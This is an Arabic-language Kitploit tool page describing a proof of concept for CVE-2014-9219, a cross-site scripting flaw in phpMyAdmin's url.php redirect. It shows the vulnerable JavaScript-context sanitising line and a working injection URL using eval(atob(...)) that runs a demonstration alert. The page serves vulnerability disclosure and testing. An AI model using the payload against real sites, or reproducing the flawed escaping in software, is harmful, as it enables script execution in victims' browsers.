Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-9219 — CVE-2014-9219 XSS POC | Kitploit
أدوات/GitHubGitHub/mohmadhafiz/cve-2014-9219
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmohmadhafiz/cve-2014-9219

CVE-2014-9219

CVE-2014-9219 XSS POC

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2014-9219

إثبات المفهوم لثغرة XSS (CVE-2014-9219)

نبذة

تحدث الثغرة بسبب خطأ في التحقق من صحة المدخلات في ميزة إعادة التوجيه في ملف url.php في phpMyAdmin 4.2.x قبل الإصدار 4.2.13.1 عند معالجة معامل url. يمكن لمهاجم عن بُعد خداع الضحية لاتباع رابط مصمم خصيصًا وتنفيذ كود HTML وسكربت تعسفي في متصفح الضحية ضمن السياق الأمني للموقع المعرّض للثغرة.

الإصدار المتأثر

phpMyAdmin: 4.2.0 - 4.2.13

المشكلة

يستخدم الكود المعرّض للثغرة htmlspecialchars() لتعقيم معامل url قبل إدراجه في سياق سلسلة نصية داخل JavaScript:

root@kitploit:~
window.location='" . htmlspecialchars($_GET['url']) . "';

دالة htmlspecialchars() مصممة لسياق HTML، وليس لسياق السلسلة النصية في JavaScript، لذلك فهي لا تقوم بترميز الهروب اللازم للأحرف التي يمكنها كسر حدود السلسلة النصية في JavaScript.

اطلع على هذا الـ commit

إثبات المفهوم

url (مُرمَّز):

root@kitploit:~
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
تنزيل الأداة

url (بعد فك الترميز):

root@kitploit:~
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'

مخرجات HTML:

root@kitploit:~
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.